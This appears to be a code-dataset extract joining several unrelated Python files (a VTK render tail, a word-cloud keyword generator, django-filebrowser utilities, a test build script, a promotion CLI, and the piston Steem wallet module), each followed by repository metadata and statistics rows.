cam.SetFocalPoint(1,1,1)
cam.SetPosition(0,0,0)
ren0.ResetCamera()
ren1.SetActiveCamera(cam)
iren.Initialize()
# render the image
#
renWin.Render()
#iren.Start()
| 23.934783 | 75 | 0.752044 | 250 | 2,202 | 6.616 | 0.48 | 0.003628 | 0.003628 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.027763 | 0.133061 | 2,202 | 91 | 76 | 24.197802 | 0.838659 | 0.161671 | 0 | 0 | 0 | 0 | 0.046605 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.054545 | 0 | 0.054545 | 0.054545 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5bcd24af92ff2049a8f1702bee4c476fb75c0379 | 3,381 | py | Python | generator/functions/make_keyword_wordart.py | niyazed/wordify | bc927947476568544cd79d05e0a2ea007e3de2d0 | [
"MIT"
] | 2 | 2020-05-18T21:33:55.000Z | 2021-03-11T17:38:37.000Z | generator/functions/make_keyword_wordart.py | niyazed/wordify | bc927947476568544cd79d05e0a2ea007e3de2d0 | [
"MIT"
] | 8 | 2020-02-14T02:26:41.000Z | 2021-09-22T18:32:00.000Z | generator/functions/make_keyword_wordart.py | niyazed/wordify | bc927947476568544cd79d05e0a2ea007e3de2d0 | [
"MIT"
] | null | null | null | import nltk
from nltk import word_tokenize
import string
from nltk.stem import WordNetLemmatizer
from wordcloud import WordCloud, STOPWORDS
#nltk.download('punkt')
#nltk.download('averaged_perceptron_tagger')
#nltk.download('wordnet')
class generate:
def __init__(self, text):
self.text = text
def clean(self):
text = self.text.lower()
printable = set(string.printable)
text = filter(lambda x: x in printable, text) #filter funny characters, if any.
self.text = "".join(text)
def process_text(self):
self.clean()
Cleaned_text = self.text
text = word_tokenize(Cleaned_text)
POS_tag = nltk.pos_tag(text)
wordnet_lemmatizer = WordNetLemmatizer()
adjective_tags = ['JJ','JJR','JJS']
lemmatized_text = []
for word in POS_tag:
if word[1] in adjective_tags:
lemmatized_text.append(str(wordnet_lemmatizer.lemmatize(word[0],pos="a")))
else:
lemmatized_text.append(str(wordnet_lemmatizer.lemmatize(word[0]))) #default POS = noun
# print ("Text tokens after lemmatization of adjectives and nouns: \n")
# print (lemmatized_text)
POS_tag = nltk.pos_tag(lemmatized_text)
stopwords = []
wanted_POS = ['NN','NNS','NNP','NNPS','JJ','JJR','JJS','VBG','FW']
for word in POS_tag:
if word[1] not in wanted_POS:
stopwords.append(word[0])
punctuations = list(str(string.punctuation))
stopwords = stopwords + punctuations
# stopword_file = open("long_stopwords.txt", "r") edit maybe
#Source = https://www.ranks.nl/stopwords
stopword_file = set(STOPWORDS)
lots_of_stopwords = []
for line in stopword_file:
lots_of_stopwords.append(str(line.strip()))
stopwords_plus = []
stopwords_plus = stopwords + lots_of_stopwords
stopwords_plus = set(stopwords_plus) #Stopwords_plus contain total set of all stopwords
processed_text = []
for word in lemmatized_text:
if word not in stopwords_plus:
processed_text.append(word)
self.text = processed_text
def generate_keyword(self):
self.process_text()
words = self.text #read the words into a list.
uniqWords = sorted(set(words)) #remove duplicate words and sort
dict={}
for word in uniqWords:
#print(words.count(word), word)
dict[word]=words.count(word)
sd = sorted(dict.items(), key=lambda kv: kv[1])
sd.reverse()
return sd
def generate_wordart(self):
words = self.text #read the words into a list.
dict ={}
for word in words:
dict[word]=0
for word in words:
dict[word]=dict[word]+1
sorted_x = sorted(dict.items(), key=lambda kv: kv[1])
sorted_x.reverse()
l = []
max_kw = 10
for i in range(0,max_kw):
l.append(sorted_x[i][0])
dictionary={}
for x in sorted_x:
dictionary[x[0]]=x[1]
wordcloud = WordCloud(font_path='kalpurush.ttf',min_font_size = 10, background_color="white").generate_from_frequencies(dictionary)
wordcloud.to_file('cloud.png')
| 28.411765 | 139 | 0.597456 | 411 | 3,381 | 4.756691 | 0.3309 | 0.036829 | 0.027621 | 0.016368 | 0.185166 | 0.185166 | 0.142199 | 0.142199 | 0.090026 | 0 | 0 | 0.007137 | 0.295475 | 3,381 | 118 | 140 | 28.652542 | 0.813602 | 0.147294 | 0 | 0.108108 | 0 | 0 | 0.021262 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.067568 | false | 0 | 0.067568 | 0 | 0.162162 | 0.027027 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5bd0c05ae4e8061d76b12526917129097eb9bc66 | 1,037 | py | Python | filebrowser/utils.py | albadrun/django-filebrowser-no-grappelli-no-pillow | 5c85efae5b5bd934b6d71582a3f0c6efe01979d6 | [
"BSD-3-Clause"
] | null | null | null | filebrowser/utils.py | albadrun/django-filebrowser-no-grappelli-no-pillow | 5c85efae5b5bd934b6d71582a3f0c6efe01979d6 | [
"BSD-3-Clause"
] | null | null | null | filebrowser/utils.py | albadrun/django-filebrowser-no-grappelli-no-pillow | 5c85efae5b5bd934b6d71582a3f0c6efe01979d6 | [
"BSD-3-Clause"
] | null | null | null | # coding: utf-8
import re
import os
import unicodedata
import math
import six
from django.utils.module_loading import import_string
from filebrowser.settings import NORMALIZE_FILENAME, CONVERT_FILENAME
def convert_filename(value):
"""
Convert Filename.
"""
if NORMALIZE_FILENAME:
chunks = value.split(os.extsep)
normalized = []
for v in chunks:
v = unicodedata.normalize('NFKD', six.text_type(
v)).encode('ascii', 'ignore').decode('ascii')
v = re.sub(r'[^\w\s-]', '', v).strip()
normalized.append(v)
if len(normalized) > 1:
value = '.'.join(normalized)
else:
value = normalized[0]
if CONVERT_FILENAME:
value = value.replace(" ", "_").lower()
return value
def path_strip(path, root):
if not path or not root:
return path
path = os.path.normcase(path)
root = os.path.normcase(root)
if path.startswith(root):
return path[len(root):]
return path
| 22.06383 | 69 | 0.600771 | 125 | 1,037 | 4.904 | 0.456 | 0.097879 | 0.068516 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004016 | 0.279653 | 1,037 | 46 | 70 | 22.543478 | 0.8166 | 0.030858 | 0 | 0.064516 | 0 | 0 | 0.031345 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.064516 | false | 0 | 0.225806 | 0 | 0.419355 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5bd19aef2b594e4beb08b1c61935213131c03545 | 1,985 | py | Python | tests/cte.py | Airleaf/traffic-sim | ff7acaefe7ef8c73d0f032ecad18947ad46da146 | [
"Apache-2.0"
] | null | null | null | tests/cte.py | Airleaf/traffic-sim | ff7acaefe7ef8c73d0f032ecad18947ad46da146 | [
"Apache-2.0"
] | 8 | 2021-02-13T15:11:58.000Z | 2021-02-15T17:39:00.000Z | tests/cte.py | Airleaf/traffic-sim | ff7acaefe7ef8c73d0f032ecad18947ad46da146 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python3
#
# This script is used for custom compilation scripts with selected
# modules in order to achieve a selected enviroment for the running
# code. This is done using the test.json file located in every test.
#
# The first argument is the name of the test enviroment, being the
# folder name where test.json is located.
#
import argparse
import json
import os
sh = os.system
# Argument parser
parser = argparse.ArgumentParser()
parser.add_argument('test', type=str, help='Name of the test directory found in tests/')
args = parser.parse_args()
def stop(msg):
# Print the given message and exit the program
print(msg)
quit()
def main():
# Check if file exists
if not os.path.isdir(args.test):
stop(f'Cannot find \'{args.test}\' or it\'s not a directory')
# Read test configuration
try:
with open(f'{args.test}/test.json') as f:
cfg = json.load(f)
except FileNotFoundError:
stop('All tests are required to have a \'test.json\' file')
if 'main' not in cfg:
stop('\'main\' field not found in test.json file')
if 'cpp-sources' not in cfg:
stop('\'cpp-sources\' field not found in test.json file')
object_files = []
# Compile
for src in cfg['cpp-sources']:
sh(f'g++ -c -o __out__/{src}.o ../src/{src}')
object_files.append(f'__out__/{src}.o')
for src in cfg['c-sources']:
sh(f'gcc -c -o __out__/{src}.o ../src/{src}')
object_files.append(f'__out__/{src}.o')
# Find links
libs = []
if 'libs' in cfg:
libs = ['-l' + s for s in cfg['libs']]
# Choose executable
exe = args.test
if 'executable' in cfg:
exe = cfg['executable']
# Link
objf = ' '.join(object_files)
libs = ' '.join(libs)
sh(f'g++ -o {args.test}/{exe} {args.test}/{cfg["main"]} {objf} {libs}')
# Execute
os.chdir(f'./{args.test}')
sh(f'./{exe}')
if __name__ == "__main__":
main()
| 24.8125 | 88 | 0.611083 | 298 | 1,985 | 3.969799 | 0.379195 | 0.047337 | 0.040575 | 0.021978 | 0.113271 | 0.113271 | 0.113271 | 0.067625 | 0.067625 | 0.067625 | 0 | 0.000666 | 0.243829 | 1,985 | 79 | 89 | 25.126582 | 0.787475 | 0.240302 | 0 | 0.047619 | 0 | 0 | 0.309396 | 0.030872 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047619 | false | 0 | 0.071429 | 0 | 0.119048 | 0.02381 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5bd351c81bdbf7b0fc4d0428569a34e08fce0261 | 1,512 | py | Python | main.py | abhilasharevur/ospin-promotion | e7814e6f2c745af250ba65ac0ab051af8ad4925c | [
"MIT"
] | null | null | null | main.py | abhilasharevur/ospin-promotion | e7814e6f2c745af250ba65ac0ab051af8ad4925c | [
"MIT"
] | null | null | null | main.py | abhilasharevur/ospin-promotion | e7814e6f2c745af250ba65ac0ab051af8ad4925c | [
"MIT"
] | null | null | null | #!/usr/bin/python3
import os.path
import argparse
from src.app import main as app_main
def run():
parser = argparse.ArgumentParser()
# command line arguments
parser.add_argument(
"--input-path",
help="Absolute path to input directory where .csv files reside",
# nargs="+",
required=True
)
parser.add_argument(
"--promotion-type",
default=None,
help="The type of promotion scheme",
)
parser.add_argument(
"--output-path",
help="Absolute path to output file to store results",
default="output/output.csv"
)
argvs = parser.parse_args()
if validate_path_dir(argvs, "input_path"):
arg_input_path = argvs.input_path
if validate_path_file(argvs, "output_path"):
arg_output_path = argvs.output_path
arg_promotion_type = argvs.promotion_type
if arg_promotion_type is None:
print("please input promotion type")
else:
app_main(arg_input_path, arg_promotion_type, arg_output_path)
def validate_path_dir(argvs, opt):
path_ = getattr(argvs, opt)
if not os.path.isdir(path_):
print("Directory path {} of {} does not exists".format(path_, opt))
return False
return True
def validate_path_file(argvs, opt):
path_ = getattr(argvs, opt)
if not os.path.isfile(path_):
print("File path {} of {} does not exists".format(path_, opt))
return False
return True
if __name__ == '__main__':
run()
| 24 | 75 | 0.64418 | 196 | 1,512 | 4.729592 | 0.336735 | 0.084142 | 0.055016 | 0.04315 | 0.243797 | 0.196332 | 0.196332 | 0.196332 | 0.196332 | 0.196332 | 0 | 0.000883 | 0.251323 | 1,512 | 62 | 76 | 24.387097 | 0.818021 | 0.03373 | 0 | 0.204545 | 0 | 0 | 0.216735 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.068182 | false | 0 | 0.068182 | 0 | 0.227273 | 0.068182 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5bd3f111c1e1343f5f5a3b4a6545c2bf77669071 | 8,310 | py | Python | piston/wallet.py | faddat/piston | 13459d720453090360ea5acace62bb40f8671d7c | [
"MIT"
] | null | null | null | piston/wallet.py | faddat/piston | 13459d720453090360ea5acace62bb40f8671d7c | [
"MIT"
] | null | null | null | piston/wallet.py | faddat/piston | 13459d720453090360ea5acace62bb40f8671d7c | [
"MIT"
] | null | null | null | import os
import json
import base64
import hashlib
from Crypto import Random
from Crypto.Cipher import AES
from steembase import PrivateKey
from appdirs import user_data_dir
import logging
log = logging.getLogger(__name__)
appname = "piston"
appauthor = "Fabian Schuh"
walletFile = "wallet.dat"
prefix = "STM"
# prefix = "TST"
class Wallet(object):
keys = []
rpc = None
aes = None
def __init__(self, rpc, *args, **kwargs):
self.rpc = rpc
def open(self, password=None):
if not password and not self.keys:
# try to load the file without password
import getpass
if self.exists():
if not self._openWallet(""):
print("Please unlock your existing wallet!")
while True :
pw = getpass.getpass('Passphrase: ')
if self._openWallet(pw):
break
else:
print("No wallet has been created yet. " +
"Please provide a passphrase for it!")
while True :
pw = getpass.getpass('Passphrase: ')
if not pw:
print("You have chosen an empty password! " +
"We assume you understand the risks!")
self._openWallet(pw)
break
else:
pwck = getpass.getpass('Retype passphrase: ')
if (pw == pwck) :
self._openWallet(pw)
break
else :
print("Given Passphrases do not match!")
def setKeys(self, keys):
self.keys = keys
def _openWallet(self, pw):
if pw != "":
self.aes = AESCipher(pw)
if self.exists():
try:
self.keys = self._loadPrivateKeys()
return True
except:
return False
else:
self._storeWallet()
return True
def isOpen(self):
return self.keys
def ensureOpen(self):
if not self.isOpen():
self.open()
@staticmethod
def exists():
data_dir = user_data_dir(appname, appauthor)
f = os.path.join(data_dir, walletFile)
return os.path.isfile(f)
def mkdir_p(self, path):
if os.path.isdir(path):
return
else:
try:
os.makedirs(path)
except OSError:
raise
def _storeWallet(self):
data_dir = user_data_dir(appname, appauthor)
f = os.path.join(data_dir, walletFile)
log.info("Your encrypted wallet file is located at " + f)
self.mkdir_p(data_dir)
try:
# Test if ciphertext can be constructed
if self.aes:
self.aes.encrypt(json.dumps(self.keys))
else:
json.dumps(self.keys)
with open(f, 'w') as fp:
if self.aes:
ciphertext = self.aes.encrypt(json.dumps(self.keys))
fp.write(ciphertext)
else:
json.dump(self.keys, fp)
except:
raise Exception("Error formating wallet. Skipping ..")
def _loadPrivateKeys(self):
data_dir = user_data_dir(appname, appauthor)
f = os.path.join(data_dir, walletFile)
if os.path.isfile(f) :
with open(f, 'r') as fp:
try:
if self.aes:
ciphertext = fp.read()
plaintext = self.aes.decrypt(ciphertext)
self.keys = json.loads(plaintext)
else:
self.keys = json.load(fp)
return self.keys
except:
raise ValueError("Error decrypting/loading keys! Check passphrase!")
else:
return []
def getPrivateKeyForPublicKey(self, pub):
self.ensureOpen()
for key in self.keys:
if format(PrivateKey(key).pubkey, prefix) == pub:
return (key)
def getPostingKeyForAccount(self, name):
account = self.rpc.get_account(name)
for authority in account["posting"]["key_auths"]:
key = self.getPrivateKeyForPublicKey(authority[0])
if key:
return key
return False
def getMemoKeyForAccount(self, name):
self.ensureOpen()
account = self.rpc.get_account(name)
key = self.getPrivateKeyForPublicKey(account["memo_key"])
if key:
return key
return False
def getActiveKeyForAccount(self, name):
self.ensureOpen()
account = self.rpc.get_account(name)
for authority in account["active"]["key_auths"]:
key = self.getPrivateKeyForPublicKey(authority[0])
if key:
return key
return False
def removePrivateKeyFromPublicKey(self, pub):
self.ensureOpen()
for key in self.keys:
if format(PrivateKey(key).pubkey, prefix) == pub:
self.keys.remove(key)
self._storeWallet()
def addPrivateKey(self, wif):
self.ensureOpen()
try:
if isinstance(wif, PrivateKey):
pub = format(wif.pubkey, prefix)
self.keys.append(str(wif))
else:
pub = format(PrivateKey(wif).pubkey, prefix)
self.keys.append(wif)
except:
log.error("Invalid Private Key Format. Please use WIF!")
return
self.keys = list(set(self.keys))
self._storeWallet()
return pub
def getAccountFromPrivateKey(self, wif):
pub = format(PrivateKey(wif).pubkey, prefix)
return self.rpc.get_key_references([pub])[0][0]
def getAccountFromPublicKey(self, pub):
return self.rpc.get_key_references([pub])[0][0]
def getAccount(self, pub):
name = self.rpc.get_key_references([pub])[0]
if not name:
return ["n/a", "n/a", pub]
else:
account = self.rpc.get_account(name[0])
keyType = self.getKeyType(account, pub)
return [name[0], keyType, pub]
def getKeyType(self, account, pub):
if pub == account["memo_key"]:
return "memo"
for authority in ["owner", "posting", "active"]:
for key in account[authority]["key_auths"]:
if pub == key[0]:
return authority
return None
def getAccounts(self):
return [self.getAccount(a) for a in self.getPublicKeys()]
def getPublicKeys(self):
self.ensureOpen()
pub = []
for key in self.keys:
try:
pub.append(format(PrivateKey(key).pubkey, prefix))
except:
continue
return pub
class AESCipher(object):
"""
A classical AES Cipher. Can use any size of data and any size of password thanks to padding.
Also ensure the coherence and the type of the data with a unicode to byte converter.
"""
def __init__(self, key):
self.bs = 32
self.key = hashlib.sha256(AESCipher.str_to_bytes(key)).digest()
@staticmethod
def str_to_bytes(data):
u_type = type(b''.decode('utf8'))
if isinstance(data, u_type):
return data.encode('utf8')
return data
def _pad(self, s):
return s + (self.bs - len(s) % self.bs) * AESCipher.str_to_bytes(chr(self.bs - len(s) % self.bs))
@staticmethod
def _unpad(s):
return s[:-ord(s[len(s) - 1:])]
def encrypt(self, raw):
raw = self._pad(AESCipher.str_to_bytes(raw))
iv = Random.new().read(AES.block_size)
cipher = AES.new(self.key, AES.MODE_CBC, iv)
return base64.b64encode(iv + cipher.encrypt(raw)).decode('utf-8')
def decrypt(self, enc):
enc = base64.b64decode(enc)
iv = enc[:AES.block_size]
cipher = AES.new(self.key, AES.MODE_CBC, iv)
return self._unpad(cipher.decrypt(enc[AES.block_size:])).decode('utf-8')
| 31.83908 | 105 | 0.530806 | 911 | 8,310 | 4.760703 | 0.243688 | 0.036892 | 0.01614 | 0.015679 | 0.307125 | 0.290523 | 0.237261 | 0.193221 | 0.193221 | 0.193221 | 0 | 0.005722 | 0.369073 | 8,310 | 260 | 106 | 31.961538 | 0.821476 | 0.032371 | 0 | 0.401826 | 0 | 0 | 0.068338 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.127854 | false | 0.045662 | 0.045662 | 0.022831 | 0.342466 | 0.018265 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |